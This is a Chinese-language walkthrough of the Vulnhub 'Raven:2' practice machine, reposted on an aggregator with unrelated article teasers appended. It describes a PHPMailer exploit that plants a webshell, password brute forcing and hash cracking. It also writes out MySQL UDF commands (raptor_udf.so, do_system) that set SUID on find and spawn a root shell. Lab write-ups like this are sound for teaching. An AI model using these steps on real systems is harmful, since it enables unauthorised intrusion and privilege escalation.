mysql靶机_[Vulnhub]靶机渗透-Raven:2

news/2024/7/7 10:10:57

0x01 Scan Host

3f7833465794a4d794496309acebb2c4.png

d2416aa4694353584c279da169a07018.png

更加详细地扫描:

a871e64c4d6dddcc0941a4ad79512308.png

0x02 Web Service

还是有个wp,老规矩用wpscan看一下,同时扫描目录。

flag1

dirb扫描出错,所以这里用gobuster:

2d6b41efd4b3aed47d468ee253937660.png

挨个看了下发现了flag1:

33e915555d2b43503a3e940aaa03886e.png

刚好wpscan的结果也出来了,wordpress的版本是4.8.7,主题twentyseven 2.2,大概看了没有什么可利用的洞。

4785f9ec69fea34103c304cd5f4e7cc1.png

再仔细看一下当时扫出的目录,发现有PHPMailer,VERSION:

d1a0e6797499457a9d99389adb54323e.png

看一下有没有Nday:

1c8c0e724e72ae8ff25ac6121da5a0d6.png

选择了40974.py这个POC,做了修改:

8fa3bb99056270f3a39f6f36f4463297.png

首先payload改成了一句话木马,然后target注意contact.php是目标发送email的页面,也是PHPMailer存在漏洞的地方,再一个就是注意第三个框的路径.访问contact.php生成shell:

20b9791bd4d717ba2ed3d9fb308bcda8.png

然后wordpress的后台密码爆破失败。

0x03 SSH Service

使用hydra爆破没出,包括常规字典以及社会工程学字典。

0x04 Privilege Escalation

Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

fdc5d01bd017dc779fdb6e58ca79eed6.png

没看到SUID以及sudo可以利用的东西。

flag2&&flag3

fcf595a1f07dbb504882ebe0dbf5e540.png

还少个flag2,刚才命令查找的目录路径不全面:

find / -name "flag*"

f72e5c7b4d9b65d75fc918dd0c18f1bb.png

现在提权没有头绪,想想还有mysql没有看,看到wp的配置文件是root:

2abbae99ee9e184baa4ce9fd1c3cf22e.png

AntSword导出是csv,所以我们自己导出:

c4c36d5672b99801ec632df5441bbcf9.png

导出后修改为user:pass的格式,然后用john跑一下HASH,还是用rockyou字典。

9e1142c294fbed96b78632e3469f11ce.png

Steven的密码是跑出来了,但是没能成功登陆SSH.

mysql-CVE-2016-6662

这样就很头疼了,最后还剩mysql:

b1d25e7cf043c0f956086fcaf8d79eaf.png

5273edb8a482bdf04b62aff175d9ce56.png

注意…我不小心是mv出来的,尽量cp吧,然后编译一下再编译成动态链接库。

use mysql;

create table foo(line blob);

insert into foo values(load_file('/var/www/html/raptor_udf.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';

create function do_system returns integer soname 'raptor_udf.so';

select * from mysql.func;

select do_system('chmod u+s /usr/bin/find');

其实就是利用这个动态链接库来创建一个自定义函数来执行命令,给find SUID权限,然后利用find提权:

find / -exec "/bin/sh" \;

flag4

但是我这里没交互式shell,用msf直接整个payload丢上去反弹也行,用我之前说过的nc没有-e参数的方法也行。我嫌麻烦就不弄了:

15ba277879509d034ba41f74237b3f4b.png

直接读flag吧,但是建议各位还是走完提权的流程最好。

6b17cbd7d7a17ed2b4675c5b7bceec42.png


http://www.niftyadmin.cn/n/2422842.html

相关文章

第一节课作业 150206119

c语言首先老师提供一个C语言的飞机游戏让大家感受一下,首先安装c-free,然后是将代码进行运行,游戏以A.S.D.W键位来控制游戏中飞机的上下左右,击中敌机可获得积分,被敌机撞中死亡一次,每次游戏有3次生还机会…

Android 主题动态切换框架:Prism

Prism(棱镜) 是一个全新的 Android 动态主题切换框架,虽然是头一次发布,但它所具备的基础功能已经足够强大了!本文介绍了 Prism 的各种用法,希望对你会有所帮助,你也可以对它进行扩展&#xff0…

openmp 互斥锁 mysql_并发读写OpenMp中的共享变量

我基本上有三个关于OpenMp的问题。并发读写OpenMp中的共享变量Q1。 OpenMp是否提供互斥共享变量?考虑下面的三个嵌套循环的简单矩阵乘法代码,使用C中的OpenMp并行化。这里A,B和C是动态空间分配双**类型的变量。线程数被适当分配一个值。#prag…

java idgenerator_Java IdGenerator.newId方法代码示例

import com.hazelcast.core.IdGenerator; //导入方法依赖的package包/类/*** {inheritDoc}*/Overridepublic void start(ClusterManager manager) throws AndesException{this.manager manager;/*** register topic listeners for cluster events. This has to be done* after…

Gartner:2016年十大信息安全技术(含解读)

在刚刚结束的2016年Gartner安全与风险管理峰会上,发布了2016年十大信息安全技术(http://www.gartner.com/newsroom/id/3347717)。这里提及的10大技术基本上都在以往的报告中详细阐述过。这10大技术分别是:1)云访问安全…

English - every和each的用法和区别

两者都有“每个”的意思,但用法不同: (1)each具有名词和形容词的功能,every只有形容词的功能. (2)each指两个或两个以上的人或事物中的“每个”;every是指三个以上的人或事物的“全体”,和all的意思相近.如…

Codeforces Round #358 (Div. 2) E. Alyona and Triangles 随机化

E. Alyona and Triangles题目连接: http://codeforces.com/contest/682/problem/E Description You are given n points with integer coordinates on the plane. Points are given in a way such that there is no triangle, formed by any three of these n point…

Python文件处理之文件写入方式与写缓存(三)

Python的open的写入方式有: write(str):将str写入文件 writelines(sequence of strings):写多行到文件,参数为可迭代对象 首先来看下writelines()这个方法: 1 f open(blogCblog.txt, w) #首先先创建一个文件对象,打开方式为w 2 …